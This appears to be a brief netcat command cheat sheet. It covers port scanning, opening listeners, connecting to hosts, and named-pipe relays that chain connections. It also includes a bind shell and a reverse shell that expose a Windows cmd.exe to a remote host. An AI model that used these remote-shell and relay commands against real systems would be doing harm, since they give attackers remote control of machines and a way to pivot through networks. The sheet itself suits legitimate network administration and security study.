#scan special port
nc -v ip port
#scan from port1 to port2
nc -v -z ip port1-port2
#listen local port
nc -l -p port
#listen local port and output detail
nc -l -v -p port
#connect to host
nc -nvv ip port
#local host
nc -nvv [remote ip] [port]
#remote host
nc -l -p port -t -e c:\\windows\\system32\\cmd.exe
#remote host
nc -l -vv -p port
#local host
nc -t -e c:\\windows\\system32\\cmd.exe ip port
mknod backpipe p
#listener2client
nc -l -p [localport] 0<backpipe |
nc [target ip] [port] |
tee backpipe
#listener2listener
nc -l -p [localport] 0<backpipe |
nc -l -p [localport2] |
tee backpipe
#client2client
nc [ip1] [port1] 0<backpipe |
nc [ip2] [port2] |
tee backpipe
